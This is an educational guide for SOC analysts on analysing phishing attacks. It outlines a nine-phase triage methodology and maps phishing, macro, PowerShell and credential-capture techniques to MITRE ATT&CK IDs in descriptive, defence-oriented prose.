Phishing Analysis

Introduction

Phishing Analysis is the methodical process of analysing a suspected phishing attack for indicators of compromise/attack. While email is the most common vector, modern phishing campaigns exploit SMS (smishing), voice calls (vishing), social media, and web-based attack surfaces. (Check the Phishing Attacks article for a refresher.)

SOC Analysts must be able to systematically analyse phishing attempts, determine their legitimacy, identify Indicators of Compromise (IOCs), and recommend remediation steps. This guide presents a generalised phishing analysis methodology that is scalable, channel-agnostic, and operationally practical.

Phishing analysis can be broken down into the 9 phases listed below.

• Phase 1: Identify the Delivery Channel

• Phase 2: Collect Artefacts

• Phase 3: Verify Sender Authenticity

• Phase 4: Analyse the Content

• Phase 5: Threat Intelligence & IOC Enrichment

• Phase 6: Determine Verdict

• Phase 7: Respond and Contain

• Phase 8: Report and Document

• Phase 9: Educate and Improve

TIP: Keeping detailed notes throughout the various phases and steps is crucial. Doing so will enable a security analyst to note down all IOCs, recreate an accurate timeline of events, correlate the artifacts and events to within known threat actors, tactics, techniques, and procedures, assist other security team members to follow efficiently, and assist with remediating any misconfigurations or security flaws, thereby mitigating future vulnerabilities, threats, and attacks.

As covered in Phase 2: Collect Artefacts, depending on the type of phishing attack (and thus communication channel), phishing analysis can be divided into four areas: Domain Analysis, URL Analysis, Attachment Analysis, and Email Header Analysis.

MITRE ATT&CK Mapping

Phishing techniques span multiple MITRE ATT&CK tactics depending on the attacker's objective. The entries below cover the full chain from initial reconnaissance through to post-click execution.

Reconnaissance: Phishing for Information (T1598) - https://attack.mitre.org/techniques/T1598/

Attackers use phishing techniques during the reconnaissance phase to gather information before launching a full attack; this includes harvesting credentials, learning about internal systems, or profiling targets. This is distinct from Initial Access phishing; the goal here is intelligence gathering, not direct compromise. 

• T1598.001 - Spearphishing via Service: Using third-party services such as LinkedIn, Microsoft Teams, WhatsApp, or social media platforms to send targeted messages designed to elicit information or credentials from the target. The platform's legitimacy lowers the target's guard.

• T1598.002 - Spearphishing Attachment: Sending a targeted email with a malicious or deceptive attachment (such as a fake form or document), intended to harvest credentials or sensitive information rather than deliver malware directly.

• T1598.003 - Spearphishing Link: Sending a targeted email containing a link to a credential harvesting page or fake login portal. The target is socially engineered into visiting the page and submitting sensitive information.

Initial Access: Phishing (T1566) https://attack.mitre.org/techniques/T1566/

The most commonly observed phishing tactic in SOC environments. The attacker's goal is to gain an initial foothold in the target environment by delivering a malicious payload or directing the user to an attacker-controlled resource.

• T1566.001 - Spearphishing Attachment: A targeted email carrying a malicious attachment (commonly a macro-enabled Office document, PDF, ISO, or archive file) that executes a payload when opened. This is one of the most prevalent initial access vectors observed in enterprise environments.

• T1566.002 - Spearphishing Link:  A targeted email containing a URL that directs the user to a malicious page, typically a credential harvesting portal, a drive-by download site, or a page that serves a malicious payload based on the user's browser or OS profile.

• T1566.003 - Spearphishing via Service:  Using a legitimate third-party communication platform, such as Google Drive, One Drive, Microsoft Teams, Slack, LinkedIn, or a cloud file-sharing service, to deliver phishing content. This technique is increasingly common as organisations tighten email security controls, and many security tools do not monitor these channels as closely.

Execution: User Execution (T1204) https://attack.mitre.org/techniques/T1204/

Phishing attacks typically require the target to take an action to trigger the payload. These techniques describe that user-interaction dependency.

• T1204.001 - Malicious Link: The user clicks a link delivered via phishing that initiates a malicious action, such as downloading a payload, redirecting to a credential harvest page, or triggering a drive-by exploit.

• T1204.002 - Malicious File: The user opens or executes a malicious file delivered via phishing, enabling a macro, running a script, or executing a dropped binary. This is the execution-side complement to T1566.001.

Defence Evasion & Execution: Obfuscation and Scripting

These techniques are commonly observed in the payload stage of phishing attacks, used to evade detection and execute malicious code on the victim's system.

• T1027 - Obfuscated Files or Information: Attackers obfuscate macro code, PowerShell commands, or scripts to evade antivirus and email gateway detection. Common techniques include Base64 encoding, character substitution, and string concatenation across multiple variables.

• T1059.001 - PowerShell: Macro-based payloads frequently drop and execute PowerShell commands to download second-stage malware, establish persistence, or enumerate the environment. Often combined with T1027 via the -EncodedCommand flag.

• T1059.003 - Windows Command Shell: The Windows Command Shell (cmd) can be used to execute manually or through Batch scripts (.bat or .cmd) various commands and payloads to establish persistence or enumerate the environment.

• T1059.005 - Visual Basic: VBA macros embedded in Office documents are one of the most common phishing payload mechanisms. Executed automatically via AutoOpen or Document_Open triggers without user awareness beyond enabling macros.

Credential Access

• T1056.003 - Input Capture - Web Portal Capture: A fake login page, mimicking Microsoft 365, banking portals, or corporate VPNs, captures credentials entered by the victim. This is the technical mechanism behind the majority of credential harvesting phishing campaigns.

• T1539 - Steal Web Session Cookie: Rather than capturing a password directly, some phishing attacks use adversary-in-the-middle proxies (e.g., Evilginx2, Modlishka) to intercept and steal authenticated session cookies, bypassing MFA entirely.

✏️ SOC Analyst Note: When triaging a phishing alert, mapping your findings to the relevant ATT&CK technique provides consistent, structured context for your incident report and enables correlation with threat intelligence on known threat actor TTPs. A single phishing email may map to multiple techniques simultaneously; for example, T1566.001 (delivery) + T1059.005 (VBA macro) + T1059.001 (PowerShell payload) + T1027 (obfuscation) is a common chain observed in commodity malware campaigns such as Emotet and QakBot.

Resources

Email Phishing Analysis Methodology Flow Chart